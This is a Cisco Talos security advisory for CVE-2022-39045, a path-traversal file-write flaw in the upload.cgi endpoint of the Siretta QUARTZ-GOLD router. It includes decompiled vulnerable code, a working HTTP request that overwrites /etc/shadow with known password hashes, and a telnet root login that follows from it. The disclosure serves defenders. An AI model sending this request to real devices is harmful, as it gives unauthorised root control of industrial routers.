CVE-2022-39045
A file write vulnerability exists in the httpd upload.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to arbitrary file upload. An attacker can send an HTTP request to trigger this vulnerability.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Siretta QUARTZ-GOLD G5.0.1.5-210720-141020
QUARTZ-GOLD - https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/
7.2 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
CWE-22 - Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
The Siretta QUARTZ-GOLD is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and many others.
The QUARTZ-GOLD router has a web server with several functionalities, a subset of which are related to the management of external files. Indeed, the web-server offers API for uploading files, downloading them, and also deleting if no longer required.
The endpoint upload.cgi permits to upload a file. Following one of the functions responsible for this API:
void input_upload.cgi(char *path,int len,char *boundary)
{
[...]
remaining_length_to_write = len;
storage_udisk = nvram_get_int("storage_udisk");
[... calculate base_folder and perform basic checks...]
else {
[...]
filename_param = (char *)webcgi_safeget("filename"); [1]
filename = "";
if (filename_param != (char *)0x0) {
filename = filename_param;
}
sprintf(buff,"%s/%s",base_folder,filename); [2]
fd = fopen(buff,"w"); [3]
if (fd == (FILE *)0x0) {
base_folder = "Unable to start pipe for mtd write";
}
else {
[...]
boundary_len = strlen(boundary);
remaining_length_to_write = (remaining_length_to_write - 6) - boundary_len;
while (0 < (int)remaining_length_to_write) {
n_bytes_to_read = remaining_length_to_write;
[...]
n_bytes_read = web_read(buff,n_bytes_to_read);
[...]
remaining_length_to_write = remaining_length_to_write - n_bytes_read;
bytes_written = safe_fwrite(buff,1,n_bytes_read,fd); [4]
[...]
}
This function will fetch the specified filename, at [1], and then it will use it to compose the file-path at [2]. The compose file-path is used at [3] to create/overwrite the file, and then the uploaded file will be used for the content of the just-created/overwritten file at [4].
Because from [1] up to [2] no sanitization is performed against the filename parameter, this function is vulnerable to a path traversal vulnerability. This can lead to overwriting an arbitrary file in the file-system and can lead to arbitrary command execution.
Sending a request like the following:
POST /upload.cgi?_http_id=<the correct tid>&filename=..%2F..%2F..%2Fetc%2Fshadow HTTP/1.1
Authorization: Basic <a valid basic auth value>
Content-Length: 286
Content-Type: multipart/form-data; boundary=906881afb7fae201f7f9962a229f9884
--906881afb7fae201f7f9962a229f9884
Content-Disposition: form-data; name="content"; filename="content"
root:$1$xxhYe9mq$YZ6ujl9zSX304B71rcuY80:0:0:99999:7:0:0:
admin:$1$xxhYe9mq$YZ6ujl9zSX304B71rcuY80:0:0:99999:7:0:0:
nobody:*:0:0:99999:7:0:0:
--906881afb7fae201f7f9962a229f9884--
If the request was successful, it is now possible to access the device using root:admin as credentials.
For instance connecting, using telnet, to the port 2323 we can provide the injected credentials:
❯ telnet 192.168.0.1 2323
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.
QUARTZ-GOLD login: root
Password:
root@QUARTZ-GOLD:/tmp/home/root#
Effectively allowing arbitrary command execution.
2022-10-14 - Initial Vendor Contact
2022-10-20 - Vendor Disclosure
2022-11-24 - Vendor Patch Release
2023-01-26 - Public Release
Discovered by Francesco Benvenuto of Cisco Talos.